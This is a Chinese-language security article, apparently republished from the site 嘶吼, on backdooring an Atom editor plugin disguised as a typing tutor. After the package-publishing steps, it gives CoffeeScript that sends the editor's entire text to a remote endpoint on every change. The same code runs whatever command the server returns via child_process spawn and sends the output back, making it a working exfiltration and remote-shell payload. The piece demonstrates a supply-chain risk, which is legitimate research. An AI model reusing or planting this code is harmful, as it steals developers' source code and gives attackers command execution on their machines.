本文讲的是
“钓鱼”插件实战:看我如何让粗心开发者的编辑器自动变身远控,
在这篇文章中,我们将探讨如何通过利用编辑器中的插件来攻击开发人员。因此,我们将研究Atom插件的工作原理及安全性。
cmd + shift + p Package Generator: Generate Package
toggle: -> console.log 'touch-type-teacher was toggled!'
git init git add . git commit -m "First commit" git remote add origin <remote_repo_url> git push -u origin master
apm-beta publish minor
toggle: -> console.log 'touch-type-teacher was toggled!' console.log 'update test'
git commit -a -m 'Add console logging' git push
apm-beta publish minor
npm install --save request@2.73.0 apm install
request = require'request '
toggle: -> request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) => console.log 'Data sent!'
module.exports = TouchTypeTeacher = touchTypeTeacherView: null modalPanel: null subscriptions: null editor: null activate: (state) -> @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState) @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false) @editor = atom.workspace.getActiveTextEditor() @subscriptions = new CompositeDisposable @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle() @subscriptions.add @editor.onDidChange (change) => @myChange()
myChange: -> request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) => {spawn} = require 'child_process' test = spawn body console.log 'External code to run:n' + body test.stdout.on 'data', (data) -> console.log 'sending output' request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) => console.log 'output sent!'
下面是它的一个演示。在左侧,您将看到用户在编辑器中输入内容,右边您将看到我们的远程服务器上的日志。
原文发布时间为:2017年9月5日
本文作者:愣娃
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。